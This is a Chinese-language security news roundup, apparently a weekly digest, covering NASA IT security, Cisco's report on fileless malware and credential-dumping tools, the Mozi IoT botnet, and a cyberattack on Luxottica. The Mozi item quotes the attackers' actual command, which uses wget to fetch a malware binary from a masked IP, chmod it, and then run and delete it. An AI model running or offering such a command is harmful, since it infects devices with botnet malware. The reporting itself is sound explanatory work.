Seaton表示,“对我们的IT能力和OCIO(首席信息官办公室)团队的要求和期望很高,来自外部参与者的威胁仍然是持续存在的问题。但是,经过艰苦的工作、奉献和创新,我有幸领导的团队已经面临挑战,要在这些充满挑战的时刻保持NASA的任务向前发展。”
马丁证实了该机构网络和IT安全的前景。他表示,“总的来说,我认为他们正在逐步改进,并朝着正确的方向前进。我认为,过去几年来,这一广阔的挑战和挑战的意义有了新的认识,因此我认为我们非常非常谨慎地乐观。”
参考来源:The Hill http://dwz.date/cAQy
(十四)无文件恶意软件成为关键端点威胁之首
思科研究人员9月21日发布研究结果称,2020年上半年,终端面临的最常见的严重网络安全威胁是无文件恶意软件。
无文件威胁包括初始感染后在内存中运行的恶意代码,而不是存储在硬盘上的文件。思科将Kovter、Poweliks、Divergent和LemonDuck等威胁标记为最常见的无文件恶意软件。上半年端点面临的另一个普遍的关键威胁是通常用于攻击和攻击后任务的两用工具。据思科称,流通中的例子包括PowerShell Empire、Cobalt Strike、Powersploit和Metasploit。
思科研究员本•纳霍尼(Ben Nahorney)在博客文章中称,“虽然这些工具可以很好地用于非恶意活动,比如渗透测试,但不良行为者经常使用它们。”凭证转储工具构成第三个严重威胁类别。思科发现,在这些工具中,最常见的是MimiKatz,这些工具会让恶意攻击者在2020年上半年从被攻破的计算机上窃取登录凭据。
这一活动似乎将延续到今年剩余的时间。美国网络安全和基础设施安全局(CISA)上周表示,发现威胁分子使用Cobalt Strike商业渗透测试工具,攻击商业和联邦政府网络;还看到民族国家成功部署开源工具MimiKatz来窃取凭据。
前三类占分析期间发现的严重程度严重性指标(IoC)的75%;其余25%由各种恶意软件混合而成,包括勒索软件(Ryuk、Maze、BitPaymer等);蠕虫(Ramnit和Qakbot);远程访问特洛伊木马(Corebot和Glupteba);银行特洛伊木马(Dridex、Dyre、Astaroth和Azorult);以及各种下载器、wipper和Rootkit。思科还研究了威胁在MITRE ATT&CK战术框架中的分布情况。
查看IOC数据的另一种方式是使用MITRE ATT&CK框架中列出的战术类别。在思科的终端安全解决方案中,每个IOC都包含有关采用的MITRE ATT和CK策略的信息。这些策略可以提供攻击不同部分目标的上下文,例如通过网络横向移动或泄露机密信息。
研究人员解释表示,多种战术可以适用于单一的IOC。例如,覆盖PowerShell Empire等两用工具的IOC包括三种策略:防御规避(它可以隐藏其活动,使其不被检测);执行(它可以运行更多模块来执行恶意任务);以及凭证访问(它可以加载窃取凭证的模块)。
到目前为止,最常见的策略是防御性规避,出现在57%的IOC警报中。执行率也经常出现,达到41%,因为在多阶段的攻击中,不良行为者会在多阶段期间发起进一步的恶意代码攻击。
Nahorney表示:“例如,使用两用工具建立持久性的攻击者可能会通过在受攻击的计算机上下载并执行凭据转储工具或勒索软件来进行后续操作。在严重程度严重的IOC中,执行比防御规避更为常见。”
两种通常用来获得立足点的策略,初始访问和坚持,排在第三和第四位,分别占11%和12%的时间。持续性出现在38%的关键IOC中,而总体上只有12%的IOC存在。
而且,通过指挥和控制进行沟通是前五大战术,出现在10%的IOC中。Nahorney表示:“虽然这些关键问题只占整个IOC警报的一小部分,但它们可以说是最具破坏性的,如果看到就需要立即关注。正如你可能预料的那样,绝大多数的预警属于中低级别,而且在这些严重程度内有各种各样的IOC。”
参考来源:threatpost http://dwz.date/cCqc
(十五)Mozi僵尸网络占物联网流量的90%
据IBM X-Force研究发现,在2019年10月至2020年6月期间,观察到的物联网网络流量中,Mozi僵尸网络占到了90%。
Mozi是一个IoT僵尸网络,借用了Mirai变体和Gafgyt恶意软件的代码,它出现在2019年末的威胁环境中。 360 Netlab的安全专家发现了Mozi僵尸网络,在发现它的时候,它正通过探测弱Telnet密码来攻击Netgear、D-Link和华为路由器。 研究人员称,2019年最后几个月,僵尸网络主要涉及DDoS攻击。 它实现了一个自定义的扩展分布式哈希表(DHT)协议,该协议提供了类似于哈希表([key,value])的查找服务。
360研究人员在发表的分析报告中表示,“Mozi僵尸网络依赖DHT协议来构建P2P网络,并使用ECDSA384和xor算法来确保其组件和P2P网络的完整性和安全性。示例通过Telnet传播,其中包含弱密码和一些已知的漏洞攻击(请参阅下面的列表)。就功能而言,Mozi僵尸网络中每个节点的指令的执行是由僵尸网络主机发出的名为Config的有效负载驱动的。”
这种实现使得添加/删除节点变得非常简单,只需最少的工作区重键。Mozi僵尸网络使用自己的扩展DHT协议实现来构建P2P网络。
恶意软件通过尝试猜测目标设备的Telnet密码并利用已知漏洞进行传播。一旦获得对设备的访问权限,僵尸程序就会尝试执行恶意负载,并且僵尸程序将自动加入Mozi P2P网络。
僵尸网络支持以下功能:DDoS攻击、收集僵尸程序信息、执行指定URL的负载、从指定的URL更新示例、执行系统或自定义命令。
根据IBM发布的最新报告,Mozi僵尸网络占2019年10月至2020年6月观察到的物联网网络流量的90%。如果考虑到与其他机器人不同的是,它没有试图将竞争对手从受损的设备中移除,那么这个百分比是令人印象深刻的。
研究人员认为,Mozi 运营商的目标是配置不佳的设备,但支撑物联网攻击激增的因素之一是威胁行为者瞄准的“不断扩大的IoT环境”。专家解释说,全球约有310亿台物联网设备部署,目前物联网部署速度为每秒127台设备。
IBM的研究表明,Mozi继续在很大程度上是通过使用命令注入(Cmdi)攻击来实现的,这种攻击通常是由于物联网设备的错误配置造成的。物联网使用量的持续增长和糟糕的配置协议可能是这一跃升背后的罪魁祸首。这一增长可能是由于COVID-19的缘故,企业网络的远程访问变得更加频繁,从而进一步推动了这一增长。
MDi攻击对物联网设备非常普遍,在Mozi攻击的情况下,威胁参与者通过使用“wget”shell命令然后更改权限以允许黑客与受影响的系统进行交互来利用CMDi。 在最近的Mozi攻击中,威胁行动者使用wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a命令来确定设备是否易受CMDi攻击,然后他们将下载并执行“mozi.a”文件。
IBM研究人员发现,Mozi僵尸网络使用的基础设施主要位于中国(占84%)。
参考来源:SecurityAffairs http://dwz.date/cBMx
(十六)意大利知名眼镜企业Luxottica遭受网络攻击
意大利知名眼镜企业Luxottica 9月18日晚遭受了网络攻击,导致意大利和中国的业务关闭,该公司运营的一些网站无法访问,包括Ray Ban、Sunglass Hut、LensCrafters、EyeMed和Pearle Vision。Luxottica的一些网站(如University sity.Luxottica.com)显示目前正在维护的信息。
Luxottica Group S.p.A.是一家意大利眼镜集团,也是全球眼镜行业最大的公司。作为一家垂直整合的公司,Luxottica设计、制造、分销和零售其眼镜品牌,包括LensCrafters、Sunglass Hut、Apex by Sunglass Hut、Pearle Vision、Target Optical、Eyemed Vision care plan。它最著名的品牌是雷朋、Persol,和Oakley。Luxottica还为Chanel、Prada、Giorgio Armani、Burberry、Versace、Dolce和Gabbana、Miu Miu和Tory Burch等设计师品牌生产太阳镜和处方镜框。Luxottica拥有超过8万名员工,2019年实现收入94亿美元。
意大利媒体报道称,位于阿戈多和塞迪科的Luxottica工厂由于计算机系统故障而中断运营。有消息称,工人们在9月21日收到了“因严重的IT问题今日的第二个轮班暂停”的短信。
安全公司Bad Packets推测,该公司使用的是Citrix ADX控制器设备,该设备容易受到Citrix设备中严重的CVE2019-19781漏洞的攻击。目前,Luxottica尚未就此次袭击发表任何官方声明。安全专家认为,威胁行为人利用上述漏洞用勒索软件感染了公司的系统。
参考来源:SecurityAffairs http://dwz.date/cCym
(如未标注,均为天地和兴工业网络安全研究院编译)
天地和兴,关键信息基础设施,安全周报
相关信息
2022-09-16
2022-09-09
2022-09-02
